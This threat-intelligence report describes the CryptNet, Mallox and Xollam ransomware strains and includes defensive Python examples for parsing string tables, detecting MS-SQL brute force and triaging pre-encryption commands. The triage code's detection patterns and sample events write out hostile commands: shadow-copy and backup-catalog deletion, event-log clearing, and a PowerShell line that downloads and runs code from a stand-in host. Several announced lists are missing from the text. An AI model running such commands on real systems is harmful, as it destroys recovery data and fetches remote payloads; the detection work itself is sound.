Although ransomware appeared to decline towards the end of 2022, there seemed to be an uptick in ransomware attacks during the second quarter of 2023. Research from SonicWall showed a 74% increase in ransomware attacks compared to the first three months of the year. According to findings by SonicWall Capture Labs Threat Researchers, the first quarter of 2023 witnessed a relatively low number of ransomware attacks, totaling 51.2 million incidents. This marked the lowest figure recorded since the fourth quarter of 2019.
In contrast, the second quarter of 2023 saw a resurgence in ransomware activity, with a 74% increase to 88.9 million attacks. The upswing observed across April, May, and June of 2023 suggests a potential resurgence in attacker activity, and the report highlighted this concern, stating, "When considering the monthly patterns, it becomes apparent that ransomware may resurge as we progress through 2023."
In July 2023, Chainalysis found that in the first half of 2023, ransomware attackers made $176 million more than they did during the same period in 2022. This is a reversal of the trend we saw in 2022, when ransomware attacks were decreasing. Now, new ransomware strains are contributing to the rise in ransomware attacks. CryptNet, Mallox, and Xollam are new strains whose operators have intensified the way they attack, posing new challenges for cybersecurity professionals. Let’s dive into the details of these ransomware strains and explore measures organizations can take to protect themselves.
In May 2023, the threat researchers at ZScaler published technical details about the ransomware strain CryptNet. The strain emerged in April 2023, and the operators claim to exfiltrate data prior to performing file encryption. According to ZScaler, CryptNet has a data leak site that lists two victims from April 2023. CryptNet appears to be a ransomware-as-a-service (RaaS) operation – recruiting affiliates via criminal forums. [1] Surprisingly, affiliates have the chance of a 90% cut, which is a big jump from the 60-80% share most groups offer.
CryptNet’s attack region is worldwide, and targeted industries include trading companies and distributors, as well as internet software and services. CryptNet promotes itself as high-speed, completely undetectable ransomware, claiming to have the ability to delete shadow copies, perform offline encryption, and disable backup services. The ransomware operators also have a chat panel for ransom negotiations.
ZScaler’s research states that CryptNet uses code that is written in .NET and obfuscated using .Net Reactor. Upon removing the obfuscation layer, it becomes clear that CryptNet bears striking similarities to the Chaos ransomware family, particularly its latest variant, Yashma. These similarities include encryption techniques, the ability to disable backup services, and the deletion of shadow copies, as mentioned above. CryptNet seems to have enhanced the Yashma code, resulting in better file encryption performance.
Image 1: String Decryption Algorithm
Source: ZScaler
[1] CryptNet: Russian ransom gang makes its debut | Cybernews
Despite the researchers successfully removing the obfuscation layer, they encountered a situation where the vital information within the ransomware code remained concealed within a resource section. This section was further protected through encryption using a customized algorithm. Once decrypted, the strings appear to be stored in sequence, with each string preceded by a DWORD value indicating its size.
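The length-prefixed layout described above (a DWORD size followed by the string bytes, repeated until the end of the decrypted resource) is easy to walk once the custom decryption step has been undone. The following reader is an added example, not Zscaler's or Avertium's code, and does not reproduce the custom decryption algorithm; it assumes a little-endian DWORD counting bytes and UTF-16LE string data (typical for .NET, but not stated on the page), builds a constructed blob in that layout so it runs offline, and reports truncation or an out-of-range size field instead of silently reading past the end.

```python
"""Reader for a DWORD-length-prefixed string table (added example, not from the
page). Assumptions: little-endian 4-byte size, size counts bytes, UTF-16LE text.
The decryption of the resource section itself is not reproduced here."""
import struct


def build_table(strings, encoding="utf-16-le"):
    """Serialise strings in the [DWORD size][bytes]... layout (used to construct sample input)."""
    out = bytearray()
    for s in strings:
        data = s.encode(encoding)
        out += struct.pack("<I", len(data)) + data
    return bytes(out)


def parse_table(blob, encoding="utf-16-le"):
    """Walk the table and return the decoded strings in order.

    Raises ValueError on a truncated size field or a size that exceeds the
    remaining data, so a corrupted or mis-decrypted blob is reported rather
    than yielding garbage.
    """
    strings = []
    off = 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError(f"truncated size field at offset {off}")
        (size,) = struct.unpack_from("<I", blob, off)
        off += 4
        remaining = len(blob) - off
        if size > remaining:
            raise ValueError(
                f"string at offset {off - 4} claims {size} bytes, only {remaining} remain"
            )
        strings.append(blob[off:off + size].decode(encoding))
        off += size
    return strings


def is_well_formed(blob, encoding="utf-16-le"):
    """True if the whole blob parses as a sequence of length-prefixed strings."""
    try:
        parse_table(blob, encoding)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


# Constructed sample strings (not recovered from any real sample) in the
# style of what such a table holds: note name stem, extension, note text.
SAMPLE_STRINGS = ["RESTORE-FILES-", ".txt", "Your files have been encrypted", ""]
SAMPLE_BLOB = build_table(SAMPLE_STRINGS)

if __name__ == "__main__":
    for i, s in enumerate(parse_table(SAMPLE_BLOB)):
        print(f"[{i}] {s!r}")
    print("truncated blob well-formed?", is_well_formed(SAMPLE_BLOB[:-1]))
```

The empty string in the sample is deliberate: a zero-length entry is valid in this layout (a size of 0 followed by no bytes), and a reader that assumes every entry has at least one byte would desynchronise on it.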
One of the initial steps carried out by the ransomware involves creating a decryption ID, which is later included in the ransom note. Once CryptNet creates the victim ID, it begins the main encryption process. The ransomware excludes the following directories from encryption:
The following file names are also excluded from encryption:
Here is a sample of file extensions (that have a matching file) CryptNet will encrypt:
The ransom note that CryptNet drops during the encryption process is named RESTORE-FILES-[9 random chars].txt. See the note below.
Image 2: CryptNet Ransom Note
Source: ZScaler
Furthermore, when the ransomware is executed with administrator privileges, CryptNet will stop a list of services. It also removes Windows shadow copies before deleting the backup catalog if the ransomware has administrator privileges. Once a victim enters the Tor site mentioned in the ransom note, a login screen asks them to enter a decryption ID and solve a captcha. Next, a timer is displayed with the option to test file decryption. There is also a chat feature to negotiate ransom payments. The chat feature also provides a link to CryptNet’s data leak site.
Although CryptNet does use the same codebase as the Yashma and Chaos ransomware families, CryptNet lacks some of Yashma’s features, namely persistence and language/country restrictions. It’s clear that CryptNet has taken the codebase of Yashma and Chaos and increased the file encryption efficiency.
Mallox ransomware specifically targets computers running Microsoft Windows. This ransomware was first observed in June 2021 and is known for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks. The ransomware’s targeted industries are manufacturing, professional and legal services, and wholesale and retail. The ransomware operators claim that their victims include worldwide organizations.
According to Lior Rochberger, a senior security researcher at Palo Alto Networks, Mallox’s sudden increase in activity is attributed to the deliberate actions taken by the group's leaders to expand Mallox's operations. Rochberger stated that the group appeared to focus more on recruiting affiliates at the beginning of 2023. This shift in strategy explains the significant increase observed this year.
Recently, researchers from Unit 42 have noticed a significant increase in Mallox ransomware activity, with a surge of almost 174% compared to 2022. This increase is primarily due to Mallox using vulnerable MS-SQL (CVE-2020-0618 and CVE-2019-1068) servers to spread the ransomware. Unit 42 also observed Mallox using tactics such as brute force, data exfiltration, and the use of network scanning tools.
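Because the page describes Mallox reaching victims through exposed MS-SQL servers and brute force, the most immediate detection a defender can build is on the SQL Server error log, which records every failed login as error 18456 with the offending client address. The following is an added example written for this page, not Unit 42's or Avertium's code: it parses constructed ERRORLOG-style lines (the addresses and timestamps are made up) and raises an alert for any client that accumulates a threshold of failures inside a sliding time window, which distinguishes a password-guessing burst from an administrator mistyping a password twice.

```python
"""Brute-force detection over SQL Server ERRORLOG lines (added example, not
from the page). The sample lines below are constructed, not from an incident."""
import re
from collections import defaultdict, deque
from datetime import datetime

# SQL Server writes "Login failed for user '<name>'. ... [CLIENT: <ip>]" after
# each error 18456 line; the timestamp prefix is "YYYY-MM-DD HH:MM:SS.ss".
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(lines):
    """Return (timestamp, user, client) for every failed-login line; skip the rest."""
    events = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window count of failures per client address.

    Returns {client: {"failures": max failures seen in one window,
                      "users": set of account names tried,
                      "first": first timestamp in the alerting window,
                      "last": last timestamp seen}} for clients at/over threshold.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, user, client in sorted(events):
        q = recent[client]
        q.append((ts, user))
        # Drop failures older than the window relative to the newest one.
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            entry = alerts.setdefault(
                client, {"failures": 0, "users": set(), "first": q[0][0], "last": ts}
            )
            entry["failures"] = max(entry["failures"], len(q))
            entry["users"].update(u for _, u in q)
            entry["last"] = ts
    return alerts


def _failed(ts, user, client):
    # Constructed line in ERRORLOG style; reason text is the common password-mismatch one.
    return (f"{ts} Logon       Login failed for user '{user}'. Reason: Password did not "
            f"match that for the login provided. [CLIENT: {client}]")


SAMPLE_LOG = [  # constructed sample, 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
    "2023-06-14 02:15:01.00 Logon       Error: 18456, Severity: 14, State: 8.",
    _failed("2023-06-14 02:15:01.00", "sa", "203.0.113.7"),
    _failed("2023-06-14 02:15:03.00", "sa", "203.0.113.7"),
    _failed("2023-06-14 02:15:05.00", "admin", "203.0.113.7"),
    _failed("2023-06-14 02:15:07.00", "sa", "203.0.113.7"),
    _failed("2023-06-14 02:15:09.00", "backup", "203.0.113.7"),
    _failed("2023-06-14 02:15:11.00", "sa", "203.0.113.7"),
    _failed("2023-06-14 02:15:30.00", "sa", "198.51.100.4"),  # one mistyped password
    _failed("2023-06-14 02:20:30.00", "sa", "198.51.100.4"),  # and another five minutes later
    "2023-06-14 02:21:00.00 spid52      Starting up database 'tempdb'.",
]

if __name__ == "__main__":
    for client, info in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)).items():
        print(f"{client}: {info['failures']} failures, accounts {sorted(info['users'])}, "
              f"{info['first']} .. {info['last']}")
```

The threshold and window are deliberately parameters: on an internet-exposed instance a burst of six failures in ten seconds from one address is unambiguous, while a server that only accepts connections from an application tier may warrant a much lower threshold. Either way, the real remediation the page points to is not exposing MS-SQL to the internet and patching CVE-2020-0618 and CVE-2019-1068, with this detection as a backstop.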
Researchers have also reported that the group has attempted to distribute Mallox via phishing emails – suggesting affiliates may be involved. Once the threat actors gain access, they use the command line and PowerShell to download the Mallox ransomware payload from a remote server. Like other ransomware groups, the initial payload tries to deactivate any services that might hinder data encryption on the targeted system. Also, it tries to erase shadow copies, making data recovery more challenging after encryption. The malware also attempts to eliminate all event logs, utilizing a commonly used Microsoft command utility to try and complicate forensic analysis.
Like CryptNet, the threat actors behind Mallox use the double extortion method – stealing data before encrypting it. They also have a data leak site where they leak the data of victims that refuse to pay or negotiate their ransom demands. Victims negotiate with the threat actors by using a private key to authenticate themselves.
As previously stated, the ransomware operators claim to have breached hundreds of organizations worldwide. Unit 42 stated that their telemetry indicates at least dozens of potential Mallox victims. In 2022, Mallox ransomware was discovered to be a variant of the TargetCompany ransomware strain.
Researchers believe that Xollam is also a variant of the TargetCompany ransomware strain because its operators use similar techniques. According to Trend Micro, in 2023 Xollam was seen using phishing campaigns and Microsoft OneNote files to gain access and distribute malware – a departure from TargetCompany’s and Mallox’s previous focus on exploiting vulnerable MS SQL databases.
According to Trend Micro’s investigation, Xollam employs a pseudo-fileless technique using PowerShell. This involves the execution of reflective loading to download its payload. Trend Micro also observed the technique in earlier variants of the TargetCompany ransomware.
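The pre-encryption behaviours this page attributes to CryptNet (stopping services, deleting shadow copies and the backup catalog), to Mallox (a PowerShell download of the payload, shadow copy deletion, event log clearing) and to Xollam and TargetCompany (PowerShell reflective loading) are all visible as process command lines, and they are far more telling together than one at a time. The following triage routine is an added example for this page, not code from Zscaler, Unit 42, Trend Micro or Avertium: it scores constructed Sysmon-style process-creation records (host, image, command line) against one rule per behaviour and raises the severity when several distinct behaviours land on the same host. Assumptions not stated on the page: wevtutil as the "commonly used Microsoft command utility" for clearing event logs, and an illustrative keyword watchlist for which service stops count as backup-related.

```python
"""Correlating pre-encryption command lines per host (added example, not from
the page). Event records and the service watchlist are constructed."""
import re

# One rule per behaviour named in the report; each is matched against the command line.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\b(vssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b"
                r"|wmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b)", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bcatalog\b", re.I)),
    ("event_log_clearing",  # assumption: the unnamed utility is wevtutil
     re.compile(r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b", re.I)),
    ("powershell_download_or_reflective_load",
     re.compile(r"powershell.*(Reflection\.Assembly|::Load\(|DownloadString|DownloadData"
                r"|Invoke-Expression|\bIEX\b|-enc(odedcommand)?\b)", re.I)),
]

# "net stop <svc>" / "sc stop <svc>" is only interesting when the service looks backup-related.
SERVICE_STOP = re.compile(r"\b(net1?|sc)(\.exe)?\s+stop\s+\"?(?P<svc>[^\s\"]+)", re.I)
SERVICE_WATCHLIST = ("backup", "vss", "sql", "veeam")  # illustrative, not from the page


def match_rules(cmdline):
    """Return the names of every behaviour rule the command line triggers."""
    hits = [name for name, pat in RULES if pat.search(cmdline)]
    m = SERVICE_STOP.search(cmdline)
    if m and any(k in m["svc"].lower() for k in SERVICE_WATCHLIST):
        hits.append("backup_service_stop")
    return hits


def severity(rule_names):
    """Three or more distinct behaviours on one host is the pre-encryption pattern."""
    n = len(rule_names)
    return "high" if n >= 3 else "medium" if n == 2 else "low"


def triage(events):
    """Group rule hits by host: {host: {"rules": set_of_names, "severity": str}}."""
    per_host = {}
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if hits:
            per_host.setdefault(ev["host"], set()).update(hits)
    return {h: {"rules": rules, "severity": severity(rules)} for h, rules in per_host.items()}


# Constructed events in a reduced Sysmon Event ID 1 shape (not from any real incident).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "image": r"C:\Windows\System32\wbadmin.exe",
     "cmdline": "wbadmin.exe delete catalog -quiet"},
    {"host": "WS01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net stop "SQLWriter"'},
    {"host": "WS01", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage')\""},
    {"host": "WS02", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net stop wuauserv"},                       # routine maintenance, no hit
    {"host": "WS02", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "SRV02", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Application"},                 # one behaviour alone: low
]

if __name__ == "__main__":
    for host, info in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {info['severity']:6} {sorted(info['rules'])}")
```

The grouping is per host rather than per event because each of these commands has a legitimate use on its own (an administrator clearing a log, a backup job stopping a writer service); the report's point is that a single process chain doing three or four of them in sequence is the pre-encryption signature, which is what the severity step captures.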
The latest version of the ransomware, Xollam, was found in February of this year. In that same month, the older version of Mallox was also active and was responsible for an attack on the Federation of Indian Chambers of Commerce and Industry (FICCI).
The TargetCompany is known to be a small and closed group. It’s clear that the operation is now exploring new methods and expanding its reach by participating in OneNote phishing campaigns. This shift allows the TargetCompany to target a broader range of potential victims, leading to higher profits.
In just two years of operation, the cybercriminals behind the ransomware have extended their operations by introducing a RaaS affiliate program and maintaining multiple channels to publicize victims and publish stolen data.
Ransomware operations are constantly evolving and adapting their tactics. CryptNet, for instance, evolved from Yashma and streamlined its code for better performance. Mallox shifted from primarily targeting MS SQL databases to using phishing campaigns with OneNote files, showing the desire to diversify their victim base. The evolving tactics, increased modification, and persistence of ransomware groups/strains underscore the ongoing need for robust cybersecurity measures, timely patching, and user education to protect against ransomware threats.
Best practices that can help protect organizations from ransomware operations like Mallox, Xollam, TargetCompany, and CryptNet:
Mid-Year Update to the 2023 SonicWall Cyber Threat Report | Threat Intelligence
Ransomware Attacks Skyrocket in Q2 2023 - Infosecurity Magazine (infosecurity-magazine.com)
Mallox Ransomware Group Escalates Cyber Threat with Enhanced Evasion Tactics (speartip.com)
CryptNet: Russian ransom gang makes its debut | Cybernews
Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks (thehackernews.com)
Technical Analysis of CryptNet Ransomware - Security Boulevard
KB4535305 - SQL Server Reporting Services remote code execution vulnerability - Microsoft Support
New CryptNet Ransomware-as-a-Service Announced on RAMP | ZeroFox
Mid-Year Update: 2023 SonicWall Cyber Threat Report
PowerPoint Presentation (hivepro.com)
Threat Group Assessment: Mallox Ransomware (paloaltonetworks.com)
Xollam the Latest Face of TargetCompany (trendmicro.com)
Mallox Ransomware Group Activity Shifts Into High Gear (darkreading.com)
Ransomware Spotlight: TargetCompany - Security News (trendmicro.com)
documents.trendmicro.com/assets/txt/ransomware-spotlight-TargetCompany-terminated-IOCs-rwdW7GY.txt
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses being exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.